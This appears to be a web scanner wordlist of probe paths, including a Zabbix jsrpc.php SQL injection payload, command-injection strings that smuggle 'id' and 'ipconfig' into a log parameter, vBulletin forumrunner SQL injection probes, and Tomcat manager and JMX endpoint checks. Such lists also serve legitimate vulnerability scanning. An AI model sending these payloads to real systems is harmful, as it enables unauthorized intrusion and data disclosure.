/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::
/cgi-bin/logoff.cgi
/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id
/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig
/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/manager/status
:8080/manager/status
:8000/manager/status
:{{jmx_ports}}
/manager/jmxproxy
/wp-content/themes/Newspaper/style.css
